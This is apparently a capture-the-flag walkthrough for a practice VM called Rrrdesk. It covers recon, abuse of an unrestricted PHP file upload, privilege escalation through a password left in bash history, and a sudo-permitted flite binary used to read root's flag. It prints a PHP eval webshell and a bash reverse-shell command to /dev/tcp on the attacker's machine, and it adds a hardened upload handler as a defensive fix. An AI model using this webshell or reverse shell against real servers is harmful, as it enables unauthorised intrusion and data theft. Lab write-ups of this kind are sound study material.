Rrrdesk [box shared by a group member]

Information gathering

┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.237 08:00:27:91:3c:4c PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.237

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 10:04 EDT
Nmap scan report for Rrrdesk (192.168.31.237)
Host is up (0.00060s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: \xE6\x96\x87\xE4\xBB\xB6\xE4\xB8\x8A\xE4\xBC\xA0\xE9\x9D\xB6\xE6\x9C\xBA
3389/tcp open ms-wbt-server Microsoft Terminal Service
MAC Address: 08:00:27:91:3C:4C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms Rrrdesk (192.168.31.237)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

Directory scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.237
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,bk,zip,tar,php,php3,bak,gz,shtml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 14529]
/.html (Status: 403) [Size: 279]
/uploads (Status: 301) [Size: 318] [--> http://192.168.31.237/uploads/]
/upload.php (Status: 302) [Size: 0] [--> index.php]
/back.zip (Status: 200) [Size: 911]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

The scan turns up /back.zip; downloading the archive shows it contains index.php and upload.php.

index.php

<!DOCTYPE html>
<html>
<head>
<title>文件上传靶机</title>
</head>
<body>
<h2>任意文件上传</h2>
<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="上传">
</form>
<hr>
<h3>Welcome</h3>
</body>
</html>

upload.php

<?php
$upload_dir = '/var/www/webdav/uploads/';
$filename = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];

if (!empty($filename)) {
    // Generate an MD5 filename (keeping the original extension)
    $file_ext = pathinfo($filename, PATHINFO_EXTENSION);
    $new_name = md5(pathinfo($filename, PATHINFO_FILENAME)) . ($file_ext ? ".$file_ext" : '');

    // Move the file into the upload directory
    if (move_uploaded_file($tmp_name, $upload_dir . $new_name)) {
        echo "Upload ok";
    } else {
        echo "文件上传失败!";
    }
} else {
    header("Location: index.php");
}
?>

Write a one-line webshell into shell.php

<?php @eval($_GET['cmd']); ?>

The MD5 of the string shell works out to 2591c98b70119fe624898b1e424b5e91,

so the backdoor URL is http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php
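The upload.php from back.zip is weak in three ways the walkthrough relies on: it keeps whatever extension the client sends, it stores the file under the web root where Apache will execute .php, and the stored name is md5() of the original basename, so the attacker can compute the final path without ever seeing it. Below is a hardened replacement written for this writeup as an added example; it is not the box's own code, and the target directory and the image allowlist are assumptions chosen for illustration.

```php
<?php
// Added example, not the original upload.php: hardened upload handler.
// Assumptions: files are stored outside the web root and served by a
// separate download script; only a few image types are accepted.
$upload_dir = '/var/www/private_uploads/';          // not under DocumentRoot
$allowed    = ['png' => 'image/png', 'jpg' => 'image/jpeg',
               'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];
$max_bytes  = 2 * 1024 * 1024;

if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    header('Location: index.php');
    exit;
}
$tmp_name = $_FILES['file']['tmp_name'];
if (!is_uploaded_file($tmp_name) || filesize($tmp_name) > $max_bytes) {
    http_response_code(400);
    exit('Upload rejected');
}

// 1. Extension allowlist (lower-cased): .php, .phtml, .phar etc. never pass,
//    unlike the original which preserved any extension the client supplied.
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!isset($allowed[$ext])) {
    http_response_code(400);
    exit('File type not allowed');
}

// 2. Check the real content, not the client-supplied $_FILES['file']['type'].
$finfo = new finfo(FILEINFO_MIME_TYPE);
if ($finfo->file($tmp_name) !== $allowed[$ext]) {
    http_response_code(400);
    exit('Content does not match extension');
}

// 3. Unguessable stored name: the original used md5(basename), which let the
//    uploader precompute the URL (md5("shell") -> 2591c98b...). A random
//    128-bit token cannot be derived from the upload request.
$new_name = bin2hex(random_bytes(16)) . '.' . $ext;
$dest     = $upload_dir . $new_name;

if (!move_uploaded_file($tmp_name, $dest)) {
    http_response_code(500);
    exit('Upload failed');
}
chmod($dest, 0640);   // readable by the web server, never executable
echo 'Upload ok';
```

Even with these checks, the upload directory should additionally have script execution disabled in Apache (a `<Directory>` block with `php_admin_flag engine off`), so a bypass of the extension filter still cannot yield code execution.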

Start a listener on Kali

nc -lnvp 4444

Visit http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php?cmd=system("bash -c 'bash -i >& /dev/tcp/<Kali IP address>/4444 0>&1'"); and back on Kali the shell has connected.

cat /home/lemon/user.txt gives the flag

flag{user-9ffbf43126e33be52cd2bf7e01d627f9}

Privilege escalation

www-data@Rrrdesk:/home/welcome$ cat /home/lemon/.bash_history
exit
flite -t 'welcome'
exit
ls -al
find .
ls -al
ss -lntup
ip a
ifconfig
ad
echo speaker | md5sum
ls -al
echo speaker | passwd
id
ls -la
exit
sudo -l
sudo gedit
sudo- l
sudo -l
sudo gedit /etc/passwd
sudo -l
sudo /usr/bin/gedit
sudo /usr/bin/gedit --display=:0
sudo /usr/bin/gedit --display=:
sudo /usr/bin/gedit --display=0
sudo /usr/bin/gedit --display=

Guess that user lemon's password is speaker (from the echo speaker | passwd line in the history), and the login succeeds.

After logging in, run sudo -l in the terminal: /usr/bin/flite can be run with sudo without a password.

A quick search shows this is the open-source TTS project festvox/flite: A small fast portable speech synthesis system.

The README mentions:

Print sentences as they are said
./bin/flite -pw doc/alice

So -pw prints each sentence as it is spoken, and running sudo /usr/bin/flite -pw /root/root.txt shows the flag.

HMV-Rrrdesk-1